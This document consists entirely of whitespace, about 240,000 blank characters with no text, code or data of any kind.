                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  